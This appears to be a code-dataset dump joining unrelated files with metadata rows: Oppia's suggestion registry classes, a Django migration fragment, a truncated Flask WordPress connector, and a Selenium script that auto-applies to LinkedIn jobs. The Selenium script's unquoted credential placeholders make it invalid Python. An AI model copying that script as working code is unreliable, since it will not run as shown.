('balance', models.FloatField(default=0)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 41.891304
| 171
| 0.60301
|
794fe8a5884c417938fb16e54f045b0d3636db61
| 41,494
|
py
|
Python
|
core/domain/suggestion_registry.py
|
shavavo/oppia
|
db78ca81804c3d05334d74efd2c5e55f86ef8545
|
[
"Apache-2.0"
] | null | null | null |
core/domain/suggestion_registry.py
|
shavavo/oppia
|
db78ca81804c3d05334d74efd2c5e55f86ef8545
|
[
"Apache-2.0"
] | 1
|
2020-03-02T21:05:42.000Z
|
2020-03-03T07:09:51.000Z
|
core/domain/suggestion_registry.py
|
shavavo/oppia
|
db78ca81804c3d05334d74efd2c5e55f86ef8545
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Registry for Oppia suggestions. Contains a BaseSuggestion class and
subclasses for each type of suggestion.
"""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
from constants import constants
from core.domain import exp_domain
from core.domain import exp_fetchers
from core.domain import exp_services
from core.domain import fs_services
from core.domain import html_cleaner
from core.domain import question_domain
from core.domain import question_services
from core.domain import skill_domain
from core.domain import skill_fetchers
from core.domain import state_domain
from core.domain import user_services
from core.platform import models
import feconf
import python_utils
import utils
(suggestion_models,) = models.Registry.import_models([models.NAMES.suggestion])
class BaseSuggestion(python_utils.OBJECT):
"""Base class for a suggestion.
Attributes:
suggestion_id: str. The ID of the suggestion.
suggestion_type: str. The type of the suggestion.
target_type: str. The type of target entity being edited.
target_id: str. The ID of the target entity being edited.
target_version_at_submission: int. The version number of the target
entity at the time of creation of the suggestion.
status: str. The status of the suggestion.
author_id: str. The ID of the user who submitted the suggestion.
final_reviewer_id: str. The ID of the reviewer who has accepted/rejected
the suggestion.
change: Change. The details of the suggestion. This should be an
object of type ExplorationChange, TopicChange, etc.
score_category: str. The scoring category for the suggestion.
last_updated: datetime.datetime. Date and time when the suggestion
was last updated.
"""
def __init__(self, status, final_reviewer_id):
"""Initializes a Suggestion object."""
self.status = status
self.final_reviewer_id = final_reviewer_id
def to_dict(self):
"""Returns a dict representation of a suggestion object.
Returns:
dict. A dict representation of a suggestion object.
"""
return {
'suggestion_id': self.suggestion_id,
'suggestion_type': self.suggestion_type,
'target_type': self.target_type,
'target_id': self.target_id,
'target_version_at_submission': self.target_version_at_submission,
'status': self.status,
'author_name': self.get_author_name(),
'final_reviewer_id': self.final_reviewer_id,
'change': self.change.to_dict(),
'score_category': self.score_category,
'last_updated': utils.get_time_in_millisecs(self.last_updated)
}
def get_score_type(self):
"""Returns the first part of the score category. The first part refers
to the the type of scoring. The value of this part will be among
suggestion_models.SCORE_TYPE_CHOICES.
Returns:
str. The first part of the score category.
"""
return self.score_category.split(
suggestion_models.SCORE_CATEGORY_DELIMITER)[0]
def get_author_name(self):
"""Returns the author's username.
Returns:
str. The username of the author of the suggestion.
"""
return user_services.get_username(self.author_id)
def get_score_sub_type(self):
"""Returns the second part of the score category. The second part refers
to the specific area where the author needs to be scored. This can be
the category of the exploration, the language of the suggestion, or the
skill linked to the question.
Returns:
str. The second part of the score category.
"""
return self.score_category.split(
suggestion_models.SCORE_CATEGORY_DELIMITER)[1]
def set_suggestion_status_to_accepted(self):
"""Sets the status of the suggestion to accepted."""
self.status = suggestion_models.STATUS_ACCEPTED
def set_suggestion_status_to_in_review(self):
"""Sets the status of the suggestion to in review."""
self.status = suggestion_models.STATUS_IN_REVIEW
def set_suggestion_status_to_rejected(self):
"""Sets the status of the suggestion to rejected."""
self.status = suggestion_models.STATUS_REJECTED
def set_final_reviewer_id(self, reviewer_id):
"""Sets the final reviewer id of the suggestion to be reviewer_id.
Args:
reviewer_id: str. The ID of the user who completed the review.
"""
self.final_reviewer_id = reviewer_id
def validate(self):
"""Validates the BaseSuggestion object. Each subclass must implement
this function.
The subclasses must validate the change and score_category fields.
Raises:
ValidationError. One or more attributes of the BaseSuggestion object
are invalid.
"""
if (
self.suggestion_type not in
suggestion_models.SUGGESTION_TYPE_CHOICES):
raise utils.ValidationError(
'Expected suggestion_type to be among allowed choices, '
'received %s' % self.suggestion_type)
if self.target_type not in suggestion_models.TARGET_TYPE_CHOICES:
raise utils.ValidationError(
'Expected target_type to be among allowed choices, '
'received %s' % self.target_type)
if not isinstance(self.target_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected target_id to be a string, received %s' % type(
self.target_id))
if not isinstance(self.target_version_at_submission, int):
raise utils.ValidationError(
'Expected target_version_at_submission to be an int, '
'received %s' % type(self.target_version_at_submission))
if self.status not in suggestion_models.STATUS_CHOICES:
raise utils.ValidationError(
'Expected status to be among allowed choices, '
'received %s' % self.status)
if not isinstance(self.author_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected author_id to be a string, received %s' % type(
self.author_id))
if (
self.author_id is not None and
not user_services.is_user_id_correct(self.author_id)
):
raise utils.ValidationError(
'Expected author_id to be in a valid user ID format, '
'received %s' % self.author_id)
if self.final_reviewer_id is not None:
if not isinstance(self.final_reviewer_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected final_reviewer_id to be a string, received %s' %
type(self.final_reviewer_id))
if (
not user_services.is_user_id_correct(
self.final_reviewer_id) and
self.final_reviewer_id != feconf.SUGGESTION_BOT_USER_ID
):
raise utils.ValidationError(
'Expected final_reviewer_id to be in a valid user ID '
'format, received %s' % self.final_reviewer_id)
if not isinstance(self.score_category, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected score_category to be a string, received %s' % type(
self.score_category))
if (
suggestion_models.SCORE_CATEGORY_DELIMITER not in
self.score_category):
raise utils.ValidationError(
'Expected score_category to be of the form'
' score_type%sscore_sub_type, received %s' % (
suggestion_models.SCORE_CATEGORY_DELIMITER,
self.score_category))
if (
len(self.score_category.split(
suggestion_models.SCORE_CATEGORY_DELIMITER))) != 2:
raise utils.ValidationError(
'Expected score_category to be of the form'
' score_type%sscore_sub_type, received %s' % (
suggestion_models.SCORE_CATEGORY_DELIMITER,
self.score_category))
if self.get_score_type() not in suggestion_models.SCORE_TYPE_CHOICES:
raise utils.ValidationError(
'Expected the first part of score_category to be among allowed'
' choices, received %s' % self.get_score_type())
def accept(self):
"""Accepts the suggestion. Each subclass must implement this
function.
"""
raise NotImplementedError(
'Subclasses of BaseSuggestion should implement accept.')
def get_change_list_for_accepting_suggestion(self):
"""Before accepting the suggestion, a change_list needs to be generated
from the change. Each subclass must implement this function.
"""
raise NotImplementedError(
'Subclasses of BaseSuggestion should implement '
'get_change_list_for_accepting_suggestion.')
def pre_accept_validate(self):
"""Performs referential validation. This function needs to be called
before accepting the suggestion.
"""
raise NotImplementedError(
'Subclasses of BaseSuggestion should implement '
'pre_accept_validate.')
def populate_old_value_of_change(self):
"""Populates the old_value field of the change."""
raise NotImplementedError(
'Subclasses of BaseSuggestion should implement '
'populate_old_value_of_change.')
def pre_update_validate(self, change):
"""Performs the pre update validation. This function needs to be called
before updating the suggestion.
"""
raise NotImplementedError(
'Subclasses of BaseSuggestion should implement '
'pre_update_validate.')
def get_all_html_content_strings(self):
"""Gets all html content strings used in this suggestion."""
raise NotImplementedError(
'Subclasses of BaseSuggestion should implement '
'get_all_html_content_strings.')
def convert_html_in_suggestion_change(self, conversion_fn):
"""Checks for HTML fields in a suggestion change and converts it
according to the conversion function.
"""
raise NotImplementedError(
'Subclasses of BaseSuggestion should implement '
'convert_html_in_suggestion_change.')
@property
def is_handled(self):
"""Returns if the suggestion has either been accepted or rejected.
Returns:
bool. Whether the suggestion has been handled or not.
"""
return self.status != suggestion_models.STATUS_IN_REVIEW
class SuggestionEditStateContent(BaseSuggestion):
"""Domain object for a suggestion of type
SUGGESTION_TYPE_EDIT_STATE_CONTENT.
"""
def __init__(
self, suggestion_id, target_id, target_version_at_submission,
status, author_id, final_reviewer_id,
change, score_category, last_updated=None):
"""Initializes an object of type SuggestionEditStateContent
corresponding to the SUGGESTION_TYPE_EDIT_STATE_CONTENT choice.
"""
super(SuggestionEditStateContent, self).__init__(
status, final_reviewer_id)
self.suggestion_id = suggestion_id
self.suggestion_type = (
suggestion_models.SUGGESTION_TYPE_EDIT_STATE_CONTENT)
self.target_type = suggestion_models.TARGET_TYPE_EXPLORATION
self.target_id = target_id
self.target_version_at_submission = target_version_at_submission
self.author_id = author_id
self.change = exp_domain.ExplorationChange(change)
self.score_category = score_category
self.last_updated = last_updated
def validate(self):
"""Validates a suggestion object of type SuggestionEditStateContent.
Raises:
ValidationError. One or more attributes of the
SuggestionEditStateContent object are invalid.
"""
super(SuggestionEditStateContent, self).validate()
if not isinstance(self.change, exp_domain.ExplorationChange):
raise utils.ValidationError(
'Expected change to be an ExplorationChange, received %s'
% type(self.change))
if self.get_score_type() != suggestion_models.SCORE_TYPE_CONTENT:
raise utils.ValidationError(
'Expected the first part of score_category to be %s '
', received %s' % (
suggestion_models.SCORE_TYPE_CONTENT,
self.get_score_type()))
if self.change.cmd != exp_domain.CMD_EDIT_STATE_PROPERTY:
raise utils.ValidationError(
'Expected cmd to be %s, received %s' % (
exp_domain.CMD_EDIT_STATE_PROPERTY, self.change.cmd))
if (self.change.property_name !=
exp_domain.STATE_PROPERTY_CONTENT):
raise utils.ValidationError(
'Expected property_name to be %s, received %s' % (
exp_domain.STATE_PROPERTY_CONTENT,
self.change.property_name))
def pre_accept_validate(self):
"""Performs referential validation. This function needs to be called
before accepting the suggestion.
"""
self.validate()
states = exp_fetchers.get_exploration_by_id(self.target_id).states
if self.change.state_name not in states:
raise utils.ValidationError(
'Expected %s to be a valid state name' %
self.change.state_name)
def get_change_list_for_accepting_suggestion(self):
"""Gets a complete change for the suggestion.
Returns:
list(ExplorationChange). The change_list corresponding to the
suggestion.
"""
change = self.change
exploration = exp_fetchers.get_exploration_by_id(self.target_id)
old_content = (
exploration.states[self.change.state_name].content.to_dict())
change.old_value = old_content
change.new_value['content_id'] = old_content['content_id']
return [change]
def populate_old_value_of_change(self):
"""Populates old value of the change."""
exploration = exp_fetchers.get_exploration_by_id(self.target_id)
if self.change.state_name not in exploration.states:
# As the state doesn't exist now, we cannot find the content of the
# state to populate the old_value field. So we set it as None.
old_content = None
else:
old_content = (
exploration.states[self.change.state_name].content.to_dict())
self.change.old_value = old_content
def accept(self, commit_message):
"""Accepts the suggestion.
Args:
commit_message: str. The commit message.
"""
change_list = self.get_change_list_for_accepting_suggestion()
exp_services.update_exploration(
self.final_reviewer_id, self.target_id, change_list,
commit_message, is_suggestion=True)
def pre_update_validate(self, change):
"""Performs the pre update validation. This function needs to be called
before updating the suggestion.
Args:
change: ExplorationChange. The new change.
Raises:
ValidationError. Invalid new change.
"""
if self.change.cmd != change.cmd:
raise utils.ValidationError(
'The new change cmd must be equal to %s' %
self.change.cmd)
elif self.change.property_name != change.property_name:
raise utils.ValidationError(
'The new change property_name must be equal to %s' %
self.change.property_name)
elif self.change.state_name != change.state_name:
raise utils.ValidationError(
'The new change state_name must be equal to %s' %
self.change.state_name)
elif self.change.new_value['html'] == change.new_value['html']:
raise utils.ValidationError(
'The new html must not match the old html')
def get_all_html_content_strings(self):
"""Gets all html content strings used in this suggestion.
Returns:
list(str). The list of html content strings.
"""
html_string_list = [self.change.new_value['html']]
if self.change.old_value is not None:
html_string_list.append(self.change.old_value['html'])
return html_string_list
def convert_html_in_suggestion_change(self, conversion_fn):
"""Checks for HTML fields in a suggestion change and converts it
according to the conversion function.
Args:
conversion_fn: function. The function to be used for converting the
HTML.
"""
if self.change.old_value is not None:
self.change.old_value['html'] = (
conversion_fn(self.change.old_value['html']))
self.change.new_value['html'] = (
conversion_fn(self.change.new_value['html']))
class SuggestionTranslateContent(BaseSuggestion):
"""Domain object for a suggestion of type
SUGGESTION_TYPE_TRANSLATE_CONTENT.
"""
def __init__(
self, suggestion_id, target_id, target_version_at_submission,
status, author_id, final_reviewer_id,
change, score_category, last_updated=None):
"""Initializes an object of type SuggestionTranslateContent
corresponding to the SUGGESTION_TYPE_TRANSLATE_CONTENT choice.
"""
super(SuggestionTranslateContent, self).__init__(
status, final_reviewer_id)
self.suggestion_id = suggestion_id
self.suggestion_type = (
suggestion_models.SUGGESTION_TYPE_TRANSLATE_CONTENT)
self.target_type = suggestion_models.TARGET_TYPE_EXPLORATION
self.target_id = target_id
self.target_version_at_submission = target_version_at_submission
self.author_id = author_id
self.change = exp_domain.ExplorationChange(change)
self.score_category = score_category
self.last_updated = last_updated
def validate(self):
"""Validates a suggestion object of type SuggestionTranslateContent.
Raises:
ValidationError. One or more attributes of the
SuggestionTranslateContent object are invalid.
"""
super(SuggestionTranslateContent, self).validate()
if not isinstance(self.change, exp_domain.ExplorationChange):
raise utils.ValidationError(
'Expected change to be an ExplorationChange, received %s'
% type(self.change))
# The score sub_type needs to match the validation for exploration
# category, i.e the second part of the score_category should match
# the target exploration's category and we have a prod validation
# for the same.
if self.get_score_type() != suggestion_models.SCORE_TYPE_TRANSLATION:
raise utils.ValidationError(
'Expected the first part of score_category to be %s '
', received %s' % (
suggestion_models.SCORE_TYPE_TRANSLATION,
self.get_score_type()))
if self.change.cmd != exp_domain.CMD_ADD_TRANSLATION:
raise utils.ValidationError(
'Expected cmd to be %s, received %s' % (
exp_domain.CMD_ADD_TRANSLATION, self.change.cmd))
if not utils.is_supported_audio_language_code(
self.change.language_code):
raise utils.ValidationError(
'Invalid language_code: %s' % self.change.language_code)
def pre_accept_validate(self):
"""Performs referential validation. This function needs to be called
before accepting the suggestion.
"""
self.validate()
exploration = exp_fetchers.get_exploration_by_id(self.target_id)
if self.change.state_name not in exploration.states:
raise utils.ValidationError(
'Expected %s to be a valid state name' % self.change.state_name)
content_html = exploration.get_content_html(
self.change.state_name, self.change.content_id)
if content_html != self.change.content_html:
raise Exception(
'The given content_html does not match the content of the '
'exploration.')
def accept(self, commit_message):
"""Accepts the suggestion.
Args:
commit_message: str. The commit message.
"""
exp_services.update_exploration(
self.final_reviewer_id, self.target_id, [self.change],
commit_message, is_suggestion=True)
def get_all_html_content_strings(self):
"""Gets all html content strings used in this suggestion.
Returns:
list(str). The list of html content strings.
"""
return [self.change.translation_html, self.change.content_html]
def convert_html_in_suggestion_change(self, conversion_fn):
"""Checks for HTML fields in a suggestion change and converts it
according to the conversion function.
Args:
conversion_fn: function. The function to be used for converting the
HTML.
"""
self.change.content_html = (
conversion_fn(self.change.content_html))
self.change.translation_html = (
conversion_fn(self.change.translation_html))
class SuggestionAddQuestion(BaseSuggestion):
"""Domain object for a suggestion of type SUGGESTION_TYPE_ADD_QUESTION.
Attributes:
suggestion_id: str. The ID of the suggestion.
suggestion_type: str. The type of the suggestion.
target_type: str. The type of target entity being edited, for this
subclass, target type is 'skill'.
target_id: str. The ID of the skill the question was submitted to.
target_version_at_submission: int. The version number of the target
topic at the time of creation of the suggestion.
status: str. The status of the suggestion.
author_id: str. The ID of the user who submitted the suggestion.
final_reviewer_id: str. The ID of the reviewer who has accepted/rejected
the suggestion.
change_cmd: QuestionChange. The change associated with the suggestion.
score_category: str. The scoring category for the suggestion.
last_updated: datetime.datetime. Date and time when the suggestion
was last updated.
"""
def __init__(
self, suggestion_id, target_id, target_version_at_submission,
status, author_id, final_reviewer_id,
change, score_category, last_updated=None):
"""Initializes an object of type SuggestionAddQuestion
corresponding to the SUGGESTION_TYPE_ADD_QUESTION choice.
"""
super(SuggestionAddQuestion, self).__init__(status, final_reviewer_id)
self.suggestion_id = suggestion_id
self.suggestion_type = suggestion_models.SUGGESTION_TYPE_ADD_QUESTION
self.target_type = suggestion_models.TARGET_TYPE_SKILL
self.target_id = target_id
self.target_version_at_submission = target_version_at_submission
self.author_id = author_id
self.change = question_domain.QuestionSuggestionChange(change)
# Update question_state_data_schema_version here instead of surfacing
# the version in the frontend.
self.change.question_dict['question_state_data_schema_version'] = (
feconf.CURRENT_STATE_SCHEMA_VERSION)
self.score_category = score_category
self.last_updated = last_updated
def validate(self):
"""Validates a suggestion object of type SuggestionAddQuestion.
Raises:
ValidationError. One or more attributes of the SuggestionAddQuestion
object are invalid.
"""
super(SuggestionAddQuestion, self).validate()
if self.get_score_type() != suggestion_models.SCORE_TYPE_QUESTION:
raise utils.ValidationError(
'Expected the first part of score_category to be "%s" '
', received "%s"' % (
suggestion_models.SCORE_TYPE_QUESTION,
self.get_score_type()))
if not isinstance(
self.change, question_domain.QuestionSuggestionChange):
raise utils.ValidationError(
'Expected change to be an instance of QuestionSuggestionChange')
if not self.change.cmd:
raise utils.ValidationError('Expected change to contain cmd')
if (
self.change.cmd !=
question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION):
raise utils.ValidationError('Expected cmd to be %s, obtained %s' % (
question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
self.change.cmd))
if not self.change.question_dict:
raise utils.ValidationError(
'Expected change to contain question_dict')
if not self.change.skill_difficulty:
raise utils.ValidationError(
'Expected change to contain skill_difficulty')
skill_difficulties = list(
constants.SKILL_DIFFICULTY_LABEL_TO_FLOAT.values())
if self._get_skill_difficulty() not in skill_difficulties:
raise utils.ValidationError(
'Expected change skill_difficulty to be one of %s, found %s '
% (skill_difficulties, self._get_skill_difficulty()))
question = question_domain.Question(
None, state_domain.State.from_dict(
self.change.question_dict['question_state_data']),
self.change.question_dict['question_state_data_schema_version'],
self.change.question_dict['language_code'], None,
self.change.question_dict['linked_skill_ids'],
self.change.question_dict['inapplicable_misconception_ids'])
question.partial_validate()
question_state_data_schema_version = (
self.change.question_dict['question_state_data_schema_version'])
if not (
question_state_data_schema_version >= 1 and
question_state_data_schema_version <=
feconf.CURRENT_STATE_SCHEMA_VERSION):
raise utils.ValidationError(
'Expected question state schema version to be between 1 and '
'%s' % feconf.CURRENT_STATE_SCHEMA_VERSION)
def pre_accept_validate(self):
"""Performs referential validation. This function needs to be called
before accepting the suggestion.
"""
if self.change.skill_id is None:
raise utils.ValidationError('Expected change to contain skill_id')
question_dict = self.change.question_dict
self.validate()
if (
question_dict['question_state_data_schema_version'] !=
feconf.CURRENT_STATE_SCHEMA_VERSION):
raise utils.ValidationError(
'Question state schema version is not up to date.')
skill_domain.Skill.require_valid_skill_id(self.change.skill_id)
skill = skill_fetchers.get_skill_by_id(
self.change.skill_id, strict=False)
if skill is None:
raise utils.ValidationError(
'The skill with the given id doesn\'t exist.')
def get_change_list_for_accepting_suggestion(self):
pass
def accept(self, unused_commit_message):
"""Accepts the suggestion.
Args:
unused_commit_message: str. This parameter is passed in for
consistency with the existing suggestions. As a default commit
message is used in the add_question function, the arg is unused.
"""
question_dict = self.change.question_dict
question_dict['version'] = 1
question_dict['id'] = (
question_services.get_new_question_id())
html_list = self.get_all_html_content_strings()
filenames = (
html_cleaner.get_image_filenames_from_html_strings(html_list))
image_context = fs_services.get_image_context_for_suggestion_target(
self.target_type)
fs_services.copy_images(
image_context, self.target_id, feconf.ENTITY_TYPE_QUESTION,
self.target_id, filenames)
question_dict['linked_skill_ids'] = [self.change.skill_id]
question = question_domain.Question.from_dict(question_dict)
question.validate()
question_services.add_question(self.author_id, question)
skill = skill_fetchers.get_skill_by_id(
self.change.skill_id, strict=False)
if skill is None:
raise utils.ValidationError(
'The skill with the given id doesn\'t exist.')
question_services.create_new_question_skill_link(
self.author_id, question_dict['id'], self.change.skill_id,
self._get_skill_difficulty())
def populate_old_value_of_change(self):
"""Populates old value of the change."""
pass
def pre_update_validate(self, change):
"""Performs the pre update validation. This functions need to be called
before updating the suggestion.
Args:
change: QuestionChange. The new change.
Raises:
ValidationError. Invalid new change.
"""
if self.change.cmd != change.cmd:
raise utils.ValidationError(
'The new change cmd must be equal to %s' %
self.change.cmd)
if self.change.skill_id != change.skill_id:
raise utils.ValidationError(
'The new change skill_id must be equal to %s' %
self.change.skill_id)
if self.change.question_dict == change.question_dict:
raise utils.ValidationError(
'The new change question_dict must not be equal to the old '
'question_dict')
def _get_skill_difficulty(self):
"""Returns the suggestion's skill difficulty."""
return self.change.skill_difficulty
def get_all_html_content_strings(self):
"""Gets all html content strings used in this suggestion.
Returns:
list(str). The list of html content strings.
"""
state_object = (
state_domain.State.from_dict(
self.change.question_dict['question_state_data']))
html_string_list = state_object.get_all_html_content_strings()
return html_string_list
def convert_html_in_suggestion_change(self, conversion_fn):
"""Checks for HTML fields in the suggestion change and converts it
according to the conversion function.
Args:
conversion_fn: function. The function to be used for converting the
HTML.
"""
self.change.question_dict['question_state_data'] = (
state_domain.State.convert_html_fields_in_state(
self.change.question_dict['question_state_data'],
conversion_fn,
state_uses_old_interaction_cust_args_schema=(
self.change.question_dict[
'question_state_data_schema_version'] < 37)
)
)
class BaseVoiceoverApplication(python_utils.OBJECT):
"""Base class for a voiceover application."""
def __init__(self):
"""Initializes a GeneralVoiceoverApplication object."""
raise NotImplementedError(
'Subclasses of BaseVoiceoverApplication should implement __init__.')
def to_dict(self):
"""Returns a dict representation of a voiceover application object.
Returns:
dict. A dict representation of a voiceover application object.
"""
return {
'voiceover_application_id': self.voiceover_application_id,
'target_type': self.target_type,
'target_id': self.target_id,
'status': self.status,
'author_name': self.get_author_name(),
'final_reviewer_name': (
None if self.final_reviewer_id is None else (
self.get_final_reviewer_name())),
'language_code': self.language_code,
'content': self.content,
'filename': self.filename,
'rejection_message': self.rejection_message
}
def get_author_name(self):
"""Returns the author's username.
Returns:
str. The username of the author of the voiceover application.
"""
return user_services.get_username(self.author_id)
def get_final_reviewer_name(self):
"""Returns the reviewer's username.
Returns:
str. The username of the reviewer of the voiceover application.
"""
return user_services.get_username(self.final_reviewer_id)
def validate(self):
"""Validates the BaseVoiceoverApplication object.
Raises:
ValidationError. One or more attributes of the
BaseVoiceoverApplication object are invalid.
"""
if self.target_type not in suggestion_models.TARGET_TYPE_CHOICES:
raise utils.ValidationError(
'Expected target_type to be among allowed choices, '
'received %s' % self.target_type)
if not isinstance(self.target_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected target_id to be a string, received %s' % type(
self.target_id))
if self.status not in suggestion_models.STATUS_CHOICES:
raise utils.ValidationError(
'Expected status to be among allowed choices, '
'received %s' % self.status)
if not isinstance(self.author_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected author_id to be a string, received %s' % type(
self.author_id))
if self.status == suggestion_models.STATUS_IN_REVIEW:
if self.final_reviewer_id is not None:
raise utils.ValidationError(
'Expected final_reviewer_id to be None as the '
'voiceover application is not yet handled.')
else:
if not isinstance(self.final_reviewer_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected final_reviewer_id to be a string, received %s' % (
type(self.final_reviewer_id)))
if self.status == suggestion_models.STATUS_REJECTED:
if not isinstance(
self.rejection_message, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected rejection_message to be a string for a '
'rejected application, received %s' % type(
self.final_reviewer_id))
if self.status == suggestion_models.STATUS_ACCEPTED:
if self.rejection_message is not None:
raise utils.ValidationError(
'Expected rejection_message to be None for the '
'accepted voiceover application, received %s' % (
self.rejection_message))
if not isinstance(self.language_code, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected language_code to be a string, received %s' %
self.language_code)
if not utils.is_supported_audio_language_code(self.language_code):
raise utils.ValidationError(
'Invalid language_code: %s' % self.language_code)
if not isinstance(self.filename, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected filename to be a string, received %s' % type(
self.filename))
if not isinstance(self.content, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected content to be a string, received %s' % type(
self.content))
def accept(self):
"""Accepts the voiceover application. Each subclass must implement this
function.
"""
raise NotImplementedError(
'Subclasses of BaseVoiceoverApplication should implement accept.')
def reject(self):
"""Rejects the voiceover application. Each subclass must implement this
function.
"""
raise NotImplementedError(
'Subclasses of BaseVoiceoverApplication should implement reject.')
@property
def is_handled(self):
"""Returns true if the voiceover application has either been accepted or
rejected.
Returns:
bool. Whether the voiceover application has been handled or not.
"""
return self.status != suggestion_models.STATUS_IN_REVIEW
class ExplorationVoiceoverApplication(BaseVoiceoverApplication):
"""Domain object for a voiceover application for exploration."""
def __init__( # pylint: disable=super-init-not-called
self, voiceover_application_id, target_id, status, author_id,
final_reviewer_id, language_code, filename, content,
rejection_message):
"""Initializes a ExplorationVoiceoverApplication domain object.
Args:
voiceover_application_id: str. The ID of the voiceover application.
target_id: str. The ID of the target entity.
status: str. The status of the voiceover application.
author_id: str. The ID of the user who submitted the voiceover
application.
final_reviewer_id: str|None. The ID of the reviewer who has
accepted/rejected the voiceover application.
language_code: str. The language code for the voiceover application.
filename: str. The filename of the voiceover audio.
content: str. The html content which is voiceover in the
application.
rejection_message: str. The plain text message submitted by the
reviewer while rejecting the application.
"""
self.voiceover_application_id = voiceover_application_id
self.target_type = suggestion_models.TARGET_TYPE_EXPLORATION
self.target_id = target_id
self.status = status
self.author_id = author_id
self.final_reviewer_id = final_reviewer_id
self.language_code = language_code
self.filename = filename
self.content = content
self.rejection_message = rejection_message
def accept(self, reviewer_id):
"""Accepts the voiceover application and updates the final_reviewer_id.
Args:
reviewer_id: str. The user ID of the reviewer.
"""
self.final_reviewer_id = reviewer_id
self.status = suggestion_models.STATUS_ACCEPTED
self.validate()
def reject(self, reviewer_id, rejection_message):
"""Rejects the voiceover application, updates the final_reviewer_id and
adds rejection message.
Args:
reviewer_id: str. The user ID of the reviewer.
rejection_message: str. The rejection message submitted by the
reviewer.
"""
self.status = suggestion_models.STATUS_REJECTED
self.final_reviewer_id = reviewer_id
self.rejection_message = rejection_message
self.validate()
VOICEOVER_APPLICATION_TARGET_TYPE_TO_DOMAIN_CLASSES = {
suggestion_models.TARGET_TYPE_EXPLORATION: (
ExplorationVoiceoverApplication)
}
SUGGESTION_TYPES_TO_DOMAIN_CLASSES = {
suggestion_models.SUGGESTION_TYPE_EDIT_STATE_CONTENT: (
SuggestionEditStateContent),
suggestion_models.SUGGESTION_TYPE_TRANSLATE_CONTENT: (
SuggestionTranslateContent),
suggestion_models.SUGGESTION_TYPE_ADD_QUESTION: SuggestionAddQuestion
}
| 41.577154
| 80
| 0.645973
|
794fe8a5c3c8d0da7b3e12f368b37f164db1f50e
| 2,205
|
py
|
Python
|
Day49/main.py
|
SSRout/100-days-of-code
|
7aafa7789a57bf701b60043fa2bf8fb61b64bfb5
|
[
"MIT"
] | null | null | null |
Day49/main.py
|
SSRout/100-days-of-code
|
7aafa7789a57bf701b60043fa2bf8fb61b64bfb5
|
[
"MIT"
] | null | null | null |
Day49/main.py
|
SSRout/100-days-of-code
|
7aafa7789a57bf701b60043fa2bf8fb61b64bfb5
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
import time
ACCOUNT_EMAIL = YOUR LOGIN EMAIL
ACCOUNT_PASSWORD = YOUR LOGIN PASSWORD
PHONE = YOUR PHONE NUMBER
chrome_driver_path = YOUR CHROME DRIVER PATH
driver = webdriver.Chrome(chrome_driver_path)
driver.get("https://www.linkedin.com/jobs/search/?f_LF=f_AL&geoId=102257491&keywords=marketing%20intern&location=London%2C%20England%2C%20United%20Kingdom&redirect=false&position=1&pageNum=0")
time.sleep(2)
sign_in_button = driver.find_element_by_link_text("Sign in")
sign_in_button.click()
time.sleep(5)
email_field = driver.find_element_by_id("username")
email_field.send_keys(ACCOUNT_EMAIL)
password_field = driver.find_element_by_id("password")
password_field.send_keys(ACCOUNT_PASSWORD)
password_field.send_keys(Keys.ENTER)
time.sleep(5)
all_listings = driver.find_elements_by_css_selector(".job-card-container--clickable")
for listing in all_listings:
print("called")
listing.click()
time.sleep(2)
try:
apply_button = driver.find_element_by_css_selector(".jobs-s-apply button")
apply_button.click()
time.sleep(5)
phone = driver.find_element_by_class_name("fb-single-line-text__input")
if phone.text == "":
phone.send_keys(PHONE)
submit_button = driver.find_element_by_css_selector("footer button")
if submit_button.get_attribute("data-control-name") == "continue_unify":
close_button = driver.find_element_by_class_name("artdeco-modal__dismiss")
close_button.click()
time.sleep(2)
discard_button = driver.find_elements_by_class_name("artdeco-modal__confirm-dialog-btn")[1]
discard_button.click()
print("Complex application, skipped.")
continue
else:
submit_button.click()
time.sleep(2)
close_button = driver.find_element_by_class_name("artdeco-modal__dismiss")
close_button.click()
except NoSuchElementException:
print("No application button, skipped.")
continue
time.sleep(5)
driver.quit()
| 33.409091
| 192
| 0.724717
|
794fea70c868b926769b8f3adb50ca1c6e38f9e2
| 4,146
|
py
|
Python
|
Connectors/WordPress/webservice.py
|
tjgillies/Locker
|
420f80f1ce6022a8502c01c36b1dafb8faf438ba
|
[
"BSD-3-Clause"
] | 1
|
2015-11-05T11:33:55.000Z
|
2015-11-05T11:33:55.000Z
|
Connectors/WordPress/webservice.py
|
tjgillies/Locker
|
420f80f1ce6022a8502c01c36b1dafb8faf438ba
|
[
"BSD-3-Clause"
] | null | null | null |
Connectors/WordPress/webservice.py
|
tjgillies/Locker
|
420f80f1ce6022a8502c01c36b1dafb8faf438ba
|
[
"BSD-3-Clause"
] | null | null | null |
import sys
import json
import logging
from flask import Flask, render_template, request, redirect, url_for
sys.path.append("../../Common/python")
import lockerfs
import client
import util
import xmlrpclib
import os
app = Flask(__name__)
@app.route("/setupAuth")
def setupAuth():
return render_template("setupAuth.html")
@app.route("/save", methods=['POST'])
def saveAuth():
logging.info("Saving auth")
